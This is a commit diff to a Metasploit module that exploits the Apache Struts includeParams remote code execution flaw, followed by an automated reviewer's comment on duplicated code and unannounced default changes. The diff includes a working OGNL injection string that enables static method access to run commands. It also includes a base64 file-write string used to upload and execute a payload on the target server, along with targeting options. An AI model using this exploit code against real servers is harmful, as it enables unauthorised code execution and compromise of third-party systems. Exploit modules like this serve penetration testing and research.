Do minor cleanup for struts_include_params
parent
a7a754ae1f
commit
146a30ec4d
|
@ -8,7 +8,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
@ -18,17 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Apache Struts includeParams Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution vulnerability in Apache Struts
|
||||
This module exploits a remote command execution vulnerability in Apache Struts
|
||||
versions < 2.3.14.2. A specifically crafted request parameter can be used to inject
|
||||
arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.
|
||||
When targeting an action which requires interaction through GET the payload should
|
||||
be split having into account the uri limits. In this case, if the rendered jsp has
|
||||
more than one point of injection, it could result in payload corruption. It should
|
||||
happen only when the payload is larger than the uri length.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
# This vulnerability was also discovered by unknown members of:
|
||||
# 'Coverity security Research Laboratory'
|
||||
# 'NSFOCUS Security Team'
|
||||
'Eric Kobrin', # Vulnerability Discovery
|
||||
'Douglas Rodrigues', # Vulnerability Discovery
|
||||
'Coverity security Research Laboratory', # Vulnerability Discovery
|
||||
'NSFOCUS Security Team', # Vulnerability Discovery
|
||||
'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
|
||||
'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -46,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['Windows Universal',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'windows'
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
['Linux Universal',
|
||||
|
@ -65,18 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'May 24 2013',
|
||||
'DefaultTarget' => 2))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]),
|
||||
OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]),
|
||||
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
|
||||
], self.class)
|
||||
|
||||
#initialise some base vars
|
||||
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
||||
OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),
|
||||
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
@ -90,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})
|
||||
end
|
||||
|
||||
# Display a nice "progress bar" instead of message spam
|
||||
# Display a nice "progress bar" instead of message spam
|
||||
case @notify_flag
|
||||
when 0
|
||||
print_status("Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload")
|
||||
|
@ -105,6 +106,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
#initialise some base vars
|
||||
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
|
||||
#Set up generic values.
|
||||
@payload_exe = rand_text_alphanumeric(4+rand(4))
|
||||
pl_exe = generate_payload_exe
|
||||
|
@ -172,6 +176,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
#initialise some base vars
|
||||
@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
print_status("Performing Check...")
|
||||
sleep_time = datastore['CHECK_SLEEPTIME']
|
||||
check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
|
||||
|
|
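Review bot: The same `@inject` template literal is now assigned in two places, at the top of `exploit` and again at the top of `check` (the `-105,6 +106,9` and `-172,6 +176,8` hunks, going by their line counts), so an edit to one copy can silently diverge from the other. Any helper that reads it without passing through either entry point would presumably find it nil. Defining the string once, for example as a class-level constant (the name is only a suggestion), and writing `@inject = INJECT_TEMPLATE` in both methods keeps the two paths in step; the `#initialise some base vars` comment could then say why this state is set per run rather than in `initialize`. Separately, the title calls this minor cleanup, yet the section also appears to change `Rank`, the default `TARGETURI` and the default `HTTPMETHOD`, which are behaviour changes worth naming in the commit message. The bodies of `exploit` and `check` continue outside the visible hunks.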